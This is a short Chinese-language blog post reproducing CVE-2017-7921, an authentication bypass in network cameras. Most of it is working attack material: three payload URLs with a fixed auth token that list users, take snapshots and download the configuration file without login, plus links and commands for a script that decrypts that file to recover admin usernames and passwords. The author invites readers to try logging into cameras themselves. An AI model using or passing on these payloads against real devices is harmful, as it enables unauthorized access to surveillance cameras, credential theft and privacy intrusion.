CVE-2017-7921复现(解密文件)

前言:CSDN管理博客内容较严格,有些内容会涉嫌违法违规,以往发布的被打回,这篇文章是经修改后的,故下面有些内容我会粗略写到,大家主要看payload即可

漏洞描述

该公司多款产品中存在身份验证漏洞。攻击者可利用该漏洞提升权限,获取敏感信息的访问权限。
通过构造url进行检索所有用户、屏幕截图、配置文件下载,得到二进制配置文件:configurationFile,并且可以提取登录的账号密码。

Payload

IP/Security/users?auth=YWRtaW46MTEK
检索所有用户
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
获取镜头快照而不进行身份验证
IP/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头二进制配置文件

影响版本

因涉嫌违法,经修改暂略

解密二进制文件(configurationFile)

1、脚本下载:

  • 百度网盘链接:https://pan.baidu.com/s/1sMV0kCeqv7mHD0BHB3qEDw
    提取码:peak
  • 脚本原链接:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

2、脚本使用方法:

  • 依赖库:pycryptodome
    依赖库安装:py -3 -m pip install pycryptodome
    因为我的电脑安装了两个版本的python,所以使用py -3
  • 解密命令:
    py -3 decrypt_configurationFile.py configurationFile
    红框中的就是后台登陆的账号密码
    在这里插入图片描述
    由于特殊原因,就写到这里,不进行摄像头的登录了,方法交给你们了,有兴趣的自己去验证吧

你可能感兴趣的:(实战漏洞复现,CVE-2017-7921,解密二进制配置文件)